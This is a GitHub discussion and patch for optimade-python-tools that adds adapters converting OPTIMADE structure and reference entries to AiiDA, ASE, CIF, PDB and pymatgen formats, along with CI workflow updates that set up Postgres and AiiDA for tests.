We currently have some entangled layers to unpick, like the server being required to generate an openapi spec (not sure we can get around this), and I don't think our grammar/filtering is mature enough yet to be separated from the example server either, at least not before OPTIMADE 1.0. shyamd: Actually that's exactly what namespace packages are for. We can still develop these packages under the same repo. As a result, build-time cross dependencies are not an issue. Since all the packages will share one version, we can keep them all consistent as well. https://packaging.python.org/guides/packaging-namespace-packages/ For an example on how this works, you might look at our MPContribs repo: https://github.com/materialsproject/MPContribs ml-evs: > Actually that's exactly what namespace packages are for. We can still develop these packages under the same repo. As a result, build-time cross dependencies are not an issue. Since all the packages will share one version, we can keep them all consistent as well. Ah, gotcha, this looks like a sensible way to go then. CasperWA: @ml-evs I haven't addressed all your comments yet, and I don't know how much more I will be able to do today. However, it is in a much better state now, I think. The tests have been modularized and a clear path to doing some centralized testing of all conversion functions has opened up, but not yet followed. Even more, is that it seems most of the modules _can_ indeed handle unknown values, as long as it's explicitly converted to `float("nan")`. CasperWA: All right @ml-evs ! I have finished addressing your review comments, it should be ready for re-review.
materials-consortia__optimade-python-tools-241
diff --git a/.github/aiida/profile.yaml b/.github/aiida/profile.yaml new file mode 100644 index 00000000..582d2859 --- /dev/null +++ b/.github/aiida/profile.yaml @@ -0,0 +1,14 @@ +--- +profile: PLACEHOLDER_PROFILE +email: aiida@localhost +first_name: AiiDA +last_name: OPTIMADE +institution: Materials-Consortia +db_backend: PLACEHOLDER_BACKEND +db_engine: postgresql_psycopg2 +db_host: localhost +db_port: 5432 +db_name: PLACEHOLDER_DATABASE_NAME +db_username: postgres +db_password: test +repository: PLACEHOLDER_REPOSITORY \ No newline at end of file diff --git a/.github/aiida/setup_aiida.sh b/.github/aiida/setup_aiida.sh new file mode 100755 index 00000000..2c481e3a --- /dev/null +++ b/.github/aiida/setup_aiida.sh @@ -0,0 +1,13 @@ +#!/usr/bin/env bash +set -ev + +# Replace the placeholders in configuration files with actual values +CONFIG="${GITHUB_WORKSPACE}/.github/aiida" +sed -i "s|PLACEHOLDER_BACKEND|${AIIDA_TEST_BACKEND}|" "${CONFIG}/profile.yaml" +sed -i "s|PLACEHOLDER_PROFILE|test_${AIIDA_TEST_BACKEND}|" "${CONFIG}/profile.yaml" +sed -i "s|PLACEHOLDER_DATABASE_NAME|test_${AIIDA_TEST_BACKEND}|" "${CONFIG}/profile.yaml" +sed -i "s|PLACEHOLDER_REPOSITORY|/tmp/test_repository_test_${AIIDA_TEST_BACKEND}/|" "${CONFIG}/profile.yaml" + +verdi setup --config "${CONFIG}/profile.yaml" + +verdi profile setdefault test_${AIIDA_TEST_BACKEND} diff --git a/.github/workflows/deps_eager.yml b/.github/workflows/deps_eager.yml index 9a4487ec..8390ba83 100644 --- a/.github/workflows/deps_eager.yml +++ b/.github/workflows/deps_eager.yml @@ -18,13 +18,25 @@ jobs: python-version: [3.6, 3.7, 3.8] services: - mongo: - image: mongo:4.2 - ports: - - 27017:27017 + mongo: + image: mongo:4.2 + ports: + - 27017:27017 + postgres: + image: postgres:10 + env: + POSTGRES_DB: test_django + POSTGRES_PASSWORD: test + options: >- + --health-cmd pg_isready + --health-interval 10s + --health-timeout 5s + --health-retries 5 + ports: + - 5432:5432 steps: - - uses: actions/checkout@master + - uses: 
actions/checkout@v2 - name: Set up Python ${{ matrix.python-version }} uses: actions/setup-python@v1 @@ -35,8 +47,8 @@ jobs: run: | python -m pip install --upgrade pip pip install -U setuptools - # Install package clean with all dependencies followed by eager update install - pip install -e .[testing,django,elastic] + # Install package clean with test dependencies followed by eager update install + pip install -e .[testing] pip install -U --upgrade-strategy eager -r .github/workflows/requirements_eager.txt - name: Run tests on updated packages @@ -49,6 +61,20 @@ jobs: env: OPTIMADE_CI_FORCE_MONGO: 0 + - name: Install adapter conversion dependencies (eagerly) + run: | + pip install -U --upgrade-strategy eager -e .[all] + # AiiDA-specific + reentry scan + + - name: Setup up environment for AiiDA + env: + AIIDA_TEST_BACKEND: django + run: .github/aiida/setup_aiida.sh + + - name: Run previously skipped tests for adapter conversion + run: pytest -rs --cov=./optimade/ --cov-report=xml --cov-append tests/adapters/ + # deps_clean-install: # runs-on: ubuntu-latest # strategy: @@ -58,7 +84,7 @@ jobs: # python-version: [3.6, 3.7, 3.8] # steps: - # - uses: actions/checkout@master + # - uses: actions/checkout@v2 # - name: Set up Python ${{ matrix.python-version }} # uses: actions/setup-python@v1 diff --git a/.github/workflows/deps_lint.yml b/.github/workflows/deps_lint.yml index f4710728..c6feb66b 100644 --- a/.github/workflows/deps_lint.yml +++ b/.github/workflows/deps_lint.yml @@ -12,7 +12,7 @@ jobs: runs-on: ubuntu-latest steps: - - uses: actions/checkout@master + - uses: actions/checkout@v2 - name: Set up Python 3.7 uses: actions/setup-python@v1 @@ -37,7 +37,7 @@ jobs: runs-on: ubuntu-latest steps: - - uses: actions/checkout@master + - uses: actions/checkout@v2 - name: Set up Python 3.7 uses: actions/setup-python@v1 @@ -59,7 +59,7 @@ jobs: runs-on: ubuntu-latest steps: - - uses: actions/checkout@master + - uses: actions/checkout@v2 - name: Set up Python 3.7 uses: 
actions/setup-python@v1 @@ -94,7 +94,7 @@ jobs: runs-on: ubuntu-latest steps: - - uses: actions/checkout@master + - uses: actions/checkout@v2 - name: Build the Docker images run: docker-compose build @@ -138,13 +138,25 @@ jobs: python-version: [3.6, 3.7, 3.8] services: - mongo: - image: mongo:4.2 - ports: - - 27017:27017 + mongo: + image: mongo:4.2 + ports: + - 27017:27017 + postgres: + image: postgres:10 + env: + POSTGRES_DB: test_django + POSTGRES_PASSWORD: test + options: >- + --health-cmd pg_isready + --health-interval 10s + --health-timeout 5s + --health-retries 5 + ports: + - 5432:5432 steps: - - uses: actions/checkout@master + - uses: actions/checkout@v2 - name: Set up Python ${{ matrix.python-version }} uses: actions/setup-python@v1 @@ -157,7 +169,7 @@ jobs: pip install -U setuptools # Install static dependencies followed by "normal" install python -m pip install -r .github/workflows/requirements.txt - pip install -e .[all] + pip install -e .[testing] - name: Run all tests (using a real MongoDB) run: pytest -rs --cov=./optimade/ --cov-report=xml @@ -169,6 +181,20 @@ jobs: env: OPTIMADE_CI_FORCE_MONGO: 0 + - name: Install adapter conversion dependencies + run: | + pip install -e .[all] + # AiiDA-specific + reentry scan + + - name: Setup up environment for AiiDA + env: + AIIDA_TEST_BACKEND: django + run: .github/aiida/setup_aiida.sh + + - name: Run previously skipped tests for adapter conversion + run: pytest -rs --cov=./optimade/ --cov-report=xml --cov-append tests/adapters/ + - name: Upload coverage to Codecov if: matrix.python-version == 3.7 && github.repository == 'Materials-Consortia/optimade-python-tools' uses: codecov/codecov-action@v1 diff --git a/.github/workflows/publish-on-pypi.yml b/.github/workflows/publish-on-pypi.yml index a699dfd1..03655a10 100644 --- a/.github/workflows/publish-on-pypi.yml +++ b/.github/workflows/publish-on-pypi.yml @@ -12,7 +12,7 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@master + uses: 
actions/checkout@v2 - name: Set up Python 3.7 uses: actions/setup-python@v1 diff --git a/.github/workflows/requirements.txt b/.github/workflows/requirements.txt index 7254f41d..18660b2c 100644 --- a/.github/workflows/requirements.txt +++ b/.github/workflows/requirements.txt @@ -1,5 +1,5 @@ -lark-parser==0.8.1 -fastapi==0.52.0 +lark-parser==0.8.5 +fastapi==0.53.1 pydantic==1.4 email_validator==1.0.5 requests==2.23.0 diff --git a/optimade/adapters/__init__.py b/optimade/adapters/__init__.py new file mode 100644 index 00000000..5429d7b2 --- /dev/null +++ b/optimade/adapters/__init__.py @@ -0,0 +1,7 @@ +# pylint: disable=undefined-variable +from .exceptions import * +from .references import * +from .structures import * + + +__all__ = exceptions.__all__ + references.__all__ + structures.__all__ diff --git a/optimade/adapters/base.py b/optimade/adapters/base.py new file mode 100644 index 00000000..f1b8b36d --- /dev/null +++ b/optimade/adapters/base.py @@ -0,0 +1,120 @@ +import re +from typing import Union, Dict, Callable, Any, Tuple, List + +from pydantic import BaseModel # pylint: disable=no-name-in-module + +from optimade.models import EntryResource + + +class EntryAdapter: + """Base class for lazy resource entry adapters + :param entry: JSON OPTIMADE single resource entry. + """ + + ENTRY_RESOURCE: EntryResource = EntryResource + _type_converters: Dict[str, Callable] = {} + + def __init__(self, entry: dict): + self._entry = None + self._converted = {} + + self.entry = entry + + # Note that these return also the default values for otherwise non-provided properties. 
# Reconstructed from mangled patch: optimade/adapters/{exceptions.py,base.py,references/__init__.py}

import re
from typing import Any, Callable, Dict, List, Tuple, Union

from pydantic import BaseModel  # pylint: disable=no-name-in-module

from optimade.models import EntryResource, ReferenceResource


class ConversionError(Exception):
    """Could not convert entry to format"""


class EntryAdapter:
    """Base class for lazy resource entry adapters.

    Wraps a single OPTIMADE JSON resource entry in its ``ENTRY_RESOURCE``
    pydantic model and converts it to other formats on demand (lazily,
    with per-format caching).

    :param entry: JSON OPTIMADE single resource entry.
    """

    ENTRY_RESOURCE: EntryResource = EntryResource
    _type_converters: Dict[str, Callable] = {}

    def __init__(self, entry: dict):
        self._entry = None
        self._converted = {}

        self.entry = entry

        # Note that these return also the default values for otherwise non-provided properties.
        self._common_converters = {
            # JSON serialized string, see https://pydantic-docs.helpmanual.io/usage/exporting_models/#modeljson
            "json": self.entry.json,
            # Python dict, see https://pydantic-docs.helpmanual.io/usage/exporting_models/#modeldict
            "dict": self.entry.dict,
        }

    @property
    def entry(self):
        """Get OPTIMADE entry"""
        return self._entry

    @entry.setter
    def entry(self, value: dict):
        """Set OPTIMADE entry.

        If already set, print that this can _only_ be set once.
        """
        if self._entry is not None:
            print("entry can only be set once and is already set.")
            return
        self._entry = self.ENTRY_RESOURCE(**value)

    def convert(self, format: str) -> Any:
        """Convert OPTIMADE entry to desired format.

        :raises AttributeError: if ``format`` is not a known converter key.
        """
        known_formats = tuple(self._type_converters.keys()) + tuple(
            self._common_converters.keys()
        )
        if format not in known_formats:
            raise AttributeError(
                f"Non-valid entry type to convert to: {format}\n"
                f"Valid entry types: {known_formats}"
            )

        # Lazily compute and cache the conversion, one entry per format.
        if self._converted.get(format, None) is None:
            converter = self._type_converters.get(format)
            if converter is not None:
                self._converted[format] = converter(self.entry)
            else:
                self._converted[format] = self._common_converters[format]()

        return self._converted[format]

    @staticmethod
    def _get_model_attributes(
        starting_instances: Union[Tuple[BaseModel], List[BaseModel]], name: str
    ) -> Any:
        """Helper method for retrieving the OPTIMADE model's attribute, supporting "."-nested attributes"""
        for res in starting_instances:
            for nested_attribute in name.split("."):
                # Only descend through declared pydantic fields.
                if nested_attribute in getattr(res, "__fields__", {}):
                    res = getattr(res, nested_attribute)
                else:
                    res = None
                    break
            if res is not None:
                return res
        raise AttributeError

    def __getattr__(self, name: str) -> Any:
        """Get converted entry or attribute from OPTIMADE entry.

        Supports any level of "."-nested OPTIMADE ENTRY_RESOURCE attributes,
        e.g., `attributes.species` for StructureResource.
        NOTE: All nested attributes must individually be subclasses of `pydantic.BaseModel`,
        so "."-nesting into lists (e.g., `attributes.species.name`) will not work.

        Order:
        - Try to return converted entry if using `as_<_type_converters key>`.
        - Try to return OPTIMADE ENTRY_RESOURCE (nested) attribute.
        - Try to return OPTIMADE ENTRY_RESOURCE.attributes (nested) attribute.
        - Raise AttributeError
        """
        # as_<entry_type>
        if name.startswith("as_"):
            entry_type = "_".join(name.split("_")[1:])
            return self.convert(entry_type)

        # Try returning ENTRY_RESOURCE attribute
        try:
            return self._get_model_attributes((self.entry, self.entry.attributes), name)
        except AttributeError:
            pass

        # Non-valid attribute: build a readable resource name for the error.
        entry_resource_name = re.match(
            r"(<class ')([a-zA-Z_]+\.)*([a-zA-Z_]+)('>)", str(self.ENTRY_RESOURCE)
        )
        entry_resource_name = (
            entry_resource_name.group(3)
            if entry_resource_name is not None
            else "UNKNOWN RESOURCE"
        )
        raise AttributeError(
            f"Unknown attribute: {name}\n"
            "If you want to get a converted entry as <entry_type> use `as_<entry_type>`, "
            f"where `<entry_type>` is one of {tuple(self._type_converters.keys()) + tuple(self._common_converters.keys())}\n"
            f"Otherwise, you can try to retrieve an OPTIMADE {entry_resource_name} attribute or property."
        )


class Reference(EntryAdapter):
    """Lazy reference resource converter

    :param reference: a single JSON OPTIMADE reference resource entry.
    """

    ENTRY_RESOURCE = ReferenceResource
+ """ + + ENTRY_RESOURCE = StructureResource + _type_converters = { + "aiida_structuredata": get_aiida_structure_data, + "ase": get_ase_atoms, + "cif": get_cif, + "pdb": get_pdb, + "pdbx_mmcif": get_pdbx_mmcif, + "pymatgen": get_pymatgen, + } diff --git a/optimade/adapters/structures/aiida.py b/optimade/adapters/structures/aiida.py new file mode 100644 index 00000000..755c7739 --- /dev/null +++ b/optimade/adapters/structures/aiida.py @@ -0,0 +1,75 @@ +from optimade.models import StructureResource as OptimadeStructure + +from optimade.adapters.structures.utils import pad_cell, pad_positions + +try: + from aiida.orm.nodes.data.structure import StructureData, Kind, Site +except (ImportError, ModuleNotFoundError): + from warnings import warn + + StructureData = None + AIIDA_NOT_FOUND = ( + "AiiDA not found, cannot convert structure to an AiiDA StructureData" + ) + + +__all__ = ("get_aiida_structure_data",) + + +def get_aiida_structure_data(optimade_structure: OptimadeStructure) -> StructureData: + """ Get AiiDA StructureData from OPTIMADE structure + :param optimade_structure: OPTIMADE structure + :return: StructureData + """ + if globals().get("StructureData", None) is None: + warn(AIIDA_NOT_FOUND) + return None + + attributes = optimade_structure.attributes + + # Convert null/None values to float("nan") + lattice_vectors, adjust_cell = pad_cell(attributes.lattice_vectors) + structure = StructureData(cell=lattice_vectors) + + # Add Kinds + for kind in attributes.species: + symbols = [] + concentration = [] + for index, chemical_symbol in enumerate(kind.chemical_symbols): + # NOTE: The non-chemical element identifier "X" is identical to how AiiDA handles this, + # so it will be treated the same as any other true chemical identifier. + if chemical_symbol == "vacancy": + # Skip. This is how AiiDA handles vacancies; + # to not include them, while keeping the concentration in a site less than 1. 
+ continue + else: + symbols.append(chemical_symbol) + concentration.append(kind.concentration[index]) + + # AiiDA needs a definition for the mass, and for it to be > 0 + # mass is OPTIONAL for OPTIMADE structures + mass = kind.mass if kind.mass else 1 + + structure.append_kind( + Kind(symbols=symbols, weights=concentration, mass=mass, name=kind.name) + ) + + # Convert null/None values to float("nan") + cartesian_site_positions, _ = pad_positions(attributes.cartesian_site_positions) + + # Add Sites + for index in range(attributes.nsites): + # range() to ensure 1-to-1 between kind and site + structure.append_site( + Site( + kind_name=attributes.species_at_sites[index], + position=cartesian_site_positions[index], + ) + ) + + if adjust_cell: + structure._adjust_default_cell( + pbc=[bool(dim.value) for dim in attributes.dimension_types] + ) + + return structure diff --git a/optimade/adapters/structures/ase.py b/optimade/adapters/structures/ase.py new file mode 100644 index 00000000..6bc05b20 --- /dev/null +++ b/optimade/adapters/structures/ase.py @@ -0,0 +1,56 @@ +from typing import Dict +from warnings import warn + +from optimade.models import Species as OptimadeStructureSpecies +from optimade.models import StructureResource as OptimadeStructure + +from optimade.adapters.exceptions import ConversionError + +try: + from ase import Atoms, Atom +except (ImportError, ModuleNotFoundError): + Atoms = None + ASE_NOT_FOUND = "ASE not found, cannot convert structure to an ASE Atoms" + + +__all__ = ("get_ase_atoms",) + + +def get_ase_atoms(optimade_structure: OptimadeStructure) -> Atoms: + """ Get ASE Atoms from OPTIMADE structure + + NOTE: Cannot handle partial occupancies (this includes vacancies) + + :param optimade_structure: OPTIMADE structure + :return: ASE.Atoms + """ + if globals().get("Atoms", None) is None: + warn(ASE_NOT_FOUND) + return None + + attributes = optimade_structure.attributes + + # Cannot handle partial occupancies + if "disorder" in 
# Reconstructed from mangled patch: optimade/adapters/structures/{ase.py,cif.py}

def get_ase_atoms(optimade_structure: "OptimadeStructure") -> "Atoms":
    """Get ASE Atoms from OPTIMADE structure.

    NOTE: Cannot handle partial occupancies (this includes vacancies).

    :param optimade_structure: OPTIMADE structure
    :return: ase.Atoms (or ``None`` with a warning if ASE is not installed)
    :raises ConversionError: if the structure declares the "disorder" feature
    """
    if globals().get("Atoms", None) is None:
        warn(ASE_NOT_FOUND)
        return None

    attributes = optimade_structure.attributes

    # Cannot handle partial occupancies
    if "disorder" in attributes.structure_features:
        raise ConversionError(
            "ASE cannot handle structures with partial occupancies, sorry."
        )

    species: Dict[str, OptimadeStructureSpecies] = {
        species.name: species for species in attributes.species
    }

    atoms = []
    for site_number in range(attributes.nsites):
        species_name = attributes.species_at_sites[site_number]
        site = attributes.cartesian_site_positions[site_number]

        current_species = species[species_name]

        # NOTE(review): the species *name* is passed as the ASE symbol — for
        # species named differently from their chemical symbol this may not be
        # a valid ASE symbol; confirm against upstream usage.
        atoms.append(
            Atom(symbol=species_name, position=site, mass=current_species.mass)
        )

    return Atoms(
        symbols=atoms, cell=attributes.lattice_vectors, pbc=attributes.dimension_types
    )


def get_cif(  # pylint: disable=too-many-locals,too-many-branches
    optimade_structure: "OptimadeStructure",
) -> str:
    """Get a CIF file as a string from an OPTIMADE structure.

    Based on `ase.io.cif:write_cif()`.

    :param optimade_structure: OPTIMADE structure
    :return: the CIF content as a Python str (or ``None`` with a warning
        if NumPy is not installed)
    """
    # NumPy is needed for calculations
    if globals().get("np", None) is None:
        warn(NUMPY_NOT_FOUND)
        return None

    cif = """#
# Created from an OPTIMADE structure.
#
# See https://www.optimade.org and/or
# https://github.com/Materials-Consortia/OPTIMADE for more information.
#
"""

    cif += f"data_{optimade_structure.id}\n\n"

    attributes = optimade_structure.attributes

    # Only emit cell data when all three lattice vectors are periodic.
    # NOTE: This also negates handling of lattice_vectors with null/None values.
    if all(attributes.dimension_types):
        a_vector, b_vector, c_vector, alpha, beta, gamma = cell_to_cellpar(
            attributes.lattice_vectors
        )

        cif += (
            f"_cell_length_a {a_vector:g}\n"
            f"_cell_length_b {b_vector:g}\n"
            f"_cell_length_c {c_vector:g}\n"
            f"_cell_angle_alpha {alpha:g}\n"
            f"_cell_angle_beta {beta:g}\n"
            f"_cell_angle_gamma {gamma:g}\n\n"
        )
        cif += (
            "_symmetry_space_group_name_H-M 'P 1'\n"
            "_symmetry_int_tables_number 1\n\n"
            "loop_\n"
            " _symmetry_equiv_pos_as_xyz\n"
            " 'x, y, z'\n\n"
        )

        # Since some structure viewers are having issues with cartesian coordinates,
        # we calculate the fractional coordinates if this is a 3D structure and
        # we have all the necessary information.
        if not hasattr(attributes, "fractional_site_positions"):
            sites, _ = pad_positions(attributes.cartesian_site_positions)
            attributes.fractional_site_positions = fractional_coordinates(
                cell=attributes.lattice_vectors, cartesian_positions=sites
            )

    # NOTE: `fractional_site_positions` is ahead of its time — the OPTIMADE
    # property is part of an open PR, see
    # https://github.com/Materials-Consortia/OPTIMADE/pull/206
    coord_type = (
        "fract" if hasattr(attributes, "fractional_site_positions") else "Cartn"
    )

    cif += (
        "loop_\n"
        " _atom_site_label\n"  # species.name
        " _atom_site_occupancy\n"  # species.concentration
        f" _atom_site_{coord_type}_x\n"  # cartesian_site_positions
        f" _atom_site_{coord_type}_y\n"  # cartesian_site_positions
        f" _atom_site_{coord_type}_z\n"  # cartesian_site_positions
        " _atom_site_thermal_displace_type\n"  # Set to 'Biso'
        " _atom_site_B_iso_or_equiv\n"  # Set to 1.0:f
        " _atom_site_type_symbol\n"  # species.chemical_symbols
    )

    if coord_type == "fract":
        sites, _ = pad_positions(attributes.fractional_site_positions)
    else:
        sites, _ = pad_positions(attributes.cartesian_site_positions)

    species: Dict[str, OptimadeStructureSpecies] = {
        species.name: species for species in attributes.species
    }

    for site_number in range(attributes.nsites):
        species_name = attributes.species_at_sites[site_number]
        site = sites[site_number]

        current_species = species[species_name]

        for index, symbol in enumerate(current_species.chemical_symbols):
            if symbol == "vacancy":
                continue

            # Default label is the species name; for genuinely multi-symbol
            # species (other than a symbol+vacancy pair) disambiguate with the
            # symbol and 1-based index.
            symbol_and_vacancy_only = (
                "vacancy" in current_species.chemical_symbols
                and len(current_species.chemical_symbols) == 2
            )
            if len(current_species.chemical_symbols) > 1 and not symbol_and_vacancy_only:
                label = f"{symbol}{index + 1}"
            else:
                label = species_name

            cif += (
                f" {label:8} {current_species.concentration[index]:6.4f} {site[0]:8.5f} "
                f"{site[1]:8.5f} {site[2]:8.5f} {'Biso':4} {'1.000':6} {symbol}\n"
            )

    return cif
# Reconstructed from mangled patch: optimade/adapters/structures/proteindatabank.py

def get_pdbx_mmcif(  # pylint: disable=too-many-locals
    optimade_structure: "OptimadeStructure",
) -> str:  # pragma: no cover
    """Write a Protein Data Bank (PDB) structure in the PDBx/mmCIF format from an OPTIMADE structure.

    Inspired by `ase.io.proteindatabank:write_proteindatabank()` in the ASE package,
    as well as `ase.io.cif:write_cif()`.

    :param optimade_structure: OPTIMADE structure
    :return: the mmCIF content as str (or ``None`` with a warning if NumPy is missing)
    """
    if globals().get("np", None) is None:
        warn(NUMPY_NOT_FOUND)
        return None

    cif = """#
# Created from an OPTIMADE structure.
#
# See https://www.optimade.org and/or
# https://github.com/Materials-Consortia/OPTIMADE for more information.
#
# CIF 2.0 format, specifically mmCIF (PDBx).
# See http://mmcif.wwpdb.org for more information.
#
"""

    entry_id = f"{optimade_structure.type}{optimade_structure.id}"
    cif += f"data_{entry_id}\n_entry.id {entry_id}\n#\n"

    attributes = optimade_structure.attributes

    # Do this only if there's three non-zero lattice vectors
    if all(attributes.dimension_types):
        a_vector, b_vector, c_vector, alpha, beta, gamma = cell_to_cellpar(
            attributes.lattice_vectors
        )

        cif += (
            f"_cell.entry_id {entry_id}\n"
            f"_cell.length_a {a_vector:g}\n"
            f"_cell.length_b {b_vector:g}\n"
            f"_cell.length_c {c_vector:g}\n"
            f"_cell.angle_alpha {alpha:g}\n"
            f"_cell.angle_beta {beta:g}\n"
            f"_cell.angle_gamma {gamma:g}\n"
            "_cell.Z_PDB 1\n#\n"
        )
        cif += (
            f"_symmetry.entry_id {entry_id}\n"
            "_symmetry.space_group_name_H-M 'P 1'\n"
            "_symmetry.Int_Tables_number 1\n#\n"
        )

        # Since some structure viewers are having issues with cartesian coordinates,
        # we calculate the fractional coordinates if this is a 3D structure and
        # we have all the necessary information.
        if not hasattr(attributes, "fractional_site_positions"):
            sites, _ = pad_positions(attributes.cartesian_site_positions)
            attributes.fractional_site_positions = fractional_coordinates(
                cell=attributes.lattice_vectors, cartesian_positions=sites
            )

    # TODO: `_struct_asym`, `_chem_comp` and `_entity` loops may be needed for a
    # strictly "valid" PDBx/mmCIF file, but carry no structure-specific
    # information at this point, so they are deliberately omitted.

    # NOTE: `fractional_site_positions` is ahead of its time — the OPTIMADE
    # property is part of an open PR, see
    # https://github.com/Materials-Consortia/OPTIMADE/pull/206
    coord_type = (
        "fract" if hasattr(attributes, "fractional_site_positions") else "Cartn"
    )

    cif += (
        "loop_\n"
        "_atom_site.group_PDB\n"  # Always "ATOM"
        "_atom_site.id\n"  # number (1-counting)
        "_atom_site.type_symbol\n"  # species.chemical_symbols
        "_atom_site.label_atom_id\n"  # species.chemical_symbols symbol + number
        "_atom_site.occupancy\n"  # species.concentration
        f"_atom_site.{coord_type}_x\n"  # cartesian_site_positions
        f"_atom_site.{coord_type}_y\n"  # cartesian_site_positions
        f"_atom_site.{coord_type}_z\n"  # cartesian_site_positions
        "_atom_site.thermal_displace_type\n"  # Set to 'Biso'
        "_atom_site.B_iso_or_equiv\n"  # Set to 1.0:f
    )

    if coord_type == "fract":
        sites, _ = pad_positions(attributes.fractional_site_positions)
    else:
        sites, _ = pad_positions(attributes.cartesian_site_positions)

    species: Dict[str, OptimadeStructureSpecies] = {
        species.name: species for species in attributes.species
    }

    for site_number in range(attributes.nsites):
        species_name = attributes.species_at_sites[site_number]
        site = sites[site_number]

        current_species = species[species_name]

        for index, symbol in enumerate(current_species.chemical_symbols):
            if symbol == "vacancy":
                continue

            # Uppercase species-name + 1-based site number by default; for
            # multi-symbol species (other than symbol+vacancy) use the symbol.
            label = f"{species_name.upper()}{site_number + 1}"
            if len(current_species.chemical_symbols) > 1:
                symbol_and_vacancy_only = (
                    "vacancy" in current_species.chemical_symbols
                    and len(current_species.chemical_symbols) == 2
                )
                if not symbol_and_vacancy_only:
                    label = f"{symbol.upper()}{index + 1}"

            cif += (
                f"ATOM {site_number + 1:5d} {symbol} {label:8} "
                f"{current_species.concentration[index]:6.4f} {site[0]:8.5f} "
                f"{site[1]:8.5f} {site[2]:8.5f} {'Biso':4} {'1.000':6}\n"
            )

    return cif


def get_pdb(  # pylint: disable=too-many-locals
    optimade_structure: "OptimadeStructure",
) -> str:
    """Write a Protein Data Bank (PDB) structure in the old PDB format from an OPTIMADE structure.

    Inspired by `ase.io.proteindatabank.write_proteindatabank()` in the ASE package.

    :param optimade_structure: OPTIMADE structure
    :return: the PDB content as str (or ``None`` with a warning if NumPy is missing)
    """
    if globals().get("np", None) is None:
        warn(NUMPY_NOT_FOUND)
        return None

    pdb = ""

    attributes = optimade_structure.attributes

    rotation = None
    if all(attributes.dimension_types):
        currentcell = np.asarray(attributes.lattice_vectors)
        cellpar = cell_to_cellpar(currentcell)
        exportedcell = cellpar_to_cell(cellpar)
        # Rotation that maps the stored cell onto the standard-orientation cell.
        rotation = np.linalg.solve(currentcell, exportedcell)
        # Setting Z-value = 1 and using P1 since we have all atoms defined explicitly
        Z = 1
        spacegroup = "P 1"
        pdb += (
            f"CRYST1{cellpar[0]:9.3f}{cellpar[1]:9.3f}{cellpar[2]:8.3f}"
            f"{cellpar[3]:7.2f}{cellpar[4]:7.2f}{cellpar[5]:7.2f} {spacegroup:11s}{Z:4d}\n"
        )

        for i, vector in enumerate(scaled_cell(currentcell)):
            pdb += f"SCALE{i + 1} {vector[0]:10.6f}{vector[1]:10.6f}{vector[2]:10.6f} {0:10.5f}\n"

    # There is a limit of 5 digit numbers in this field.
    pdb_maxnum = 100000
    bfactor = 1.0

    pdb += "MODEL 1\n"

    species: Dict[str, OptimadeStructureSpecies] = {
        species.name: species for species in attributes.species
    }

    cartesian_site_positions, _ = pad_positions(attributes.cartesian_site_positions)
    sites = np.asarray(cartesian_site_positions)
    if rotation is not None:
        sites = sites.dot(rotation)

    for site_number in range(attributes.nsites):
        species_name = attributes.species_at_sites[site_number]
        site = sites[site_number]

        current_species = species[species_name]

        for index, symbol in enumerate(current_species.chemical_symbols):
            if symbol == "vacancy":
                continue

            label = species_name
            if len(current_species.chemical_symbols) > 1:
                symbol_and_vacancy_only = (
                    "vacancy" in current_species.chemical_symbols
                    and len(current_species.chemical_symbols) == 2
                )
                if not symbol_and_vacancy_only:
                    label = f"{symbol}{index + 1}"

            # NOTE(review): serial is `site_number % pdb_maxnum` (0-based); ASE's
            # writer uses a 1-based serial — confirm whether `+ 1` was intended.
            pdb += (
                f"ATOM {site_number % pdb_maxnum:5d} {label:4} MOL 1 "
                f"{site[0]:8.3f}{site[1]:8.3f}{site[2]:8.3f}"
                f"{current_species.concentration[index]:6.2f}"
                f"{bfactor:6.2f} {symbol.upper():2} \n"
            )
    pdb += "ENDMDL\n"

    return pdb
OptimadeStructure) -> Union[Structure, Molecule]: + """ Get pymatgen Structure or Molecule from OPTIMADE structure + + :param optimade_structure: OPTIMADE structure + :return: pymatgen.Structure , pymatgen.Molecule + """ + if globals().get("Structure", None) is None: + warn(PYMATGEN_NOT_FOUND) + return None + + if all(optimade_structure.attributes.dimension_types): + return _get_structure(optimade_structure) + + return _get_molecule(optimade_structure) + + +def _get_structure(optimade_structure: OptimadeStructure) -> Structure: + """Create pymatgen Structure from OPTIMADE structure""" + + attributes = optimade_structure.attributes + + cartesian_site_positions, _ = pad_positions(attributes.cartesian_site_positions) + + return Structure( + lattice=attributes.lattice_vectors, + species=_pymatgen_species( + nsites=attributes.nsites, + species=attributes.species, + species_at_sites=attributes.species_at_sites, + ), + coords=cartesian_site_positions, + coords_are_cartesian=True, + ) + + +def _get_molecule(optimade_structure: OptimadeStructure) -> Molecule: + """Create pymatgen Molecule from OPTIMADE structure""" + + attributes = optimade_structure.attributes + + cartesian_site_positions, _ = pad_positions(attributes.cartesian_site_positions) + + return Molecule( + species=_pymatgen_species( + nsites=attributes.nsites, + species=attributes.species, + species_at_sites=attributes.species_at_sites, + ), + coords=cartesian_site_positions, + ) + + +def _pymatgen_species( + nsites: int, species: List[OptimadeStructureSpecies], species_at_sites: List[str] +) -> List[Dict[str, float]]: + """ + Create list of {"symbol": "concentration"} per site for values to pymatgen species parameters. + Remove vacancies, if they are present. 
+ """ + + optimade_species = {_.name: _ for _ in species} + + pymatgen_species = [] + for site_number in range(nsites): + species_name = species_at_sites[site_number] + current_species = optimade_species[species_name] + + chemical_symbols = [] + concentration = [] + for index, symbol in enumerate(current_species.chemical_symbols): + if symbol == "vacancy": + # Skip. This is how pymatgen handles vacancies; + # to not include them, while keeping the concentration in a site less than 1. + continue + else: + chemical_symbols.append(symbol) + concentration.append(current_species.concentration[index]) + + pymatgen_species.append(dict(zip(chemical_symbols, concentration))) + + return pymatgen_species diff --git a/optimade/adapters/structures/utils.py b/optimade/adapters/structures/utils.py new file mode 100644 index 00000000..32fe3c36 --- /dev/null +++ b/optimade/adapters/structures/utils.py @@ -0,0 +1,249 @@ +# pylint: disable=invalid-name +from typing import List, Tuple, Iterable + +from optimade.models import StructureResourceAttributes +from optimade.models.structures import Vector3D + +from optimade.adapters.exceptions import ConversionError + +try: + import numpy as np +except ImportError: + from warnings import warn + + np = None + NUMPY_NOT_FOUND = "NumPy not found, cannot convert structure to your desired format" + + +def scaled_cell( + cell: Tuple[Vector3D, Vector3D, Vector3D] +) -> Tuple[Vector3D, Vector3D, Vector3D]: + """Return a scaled 3x3 cell from cartesian 3x3 cell (`lattice_vectors`) + + This is based on PDB's method of calculating SCALE from CRYST data. 
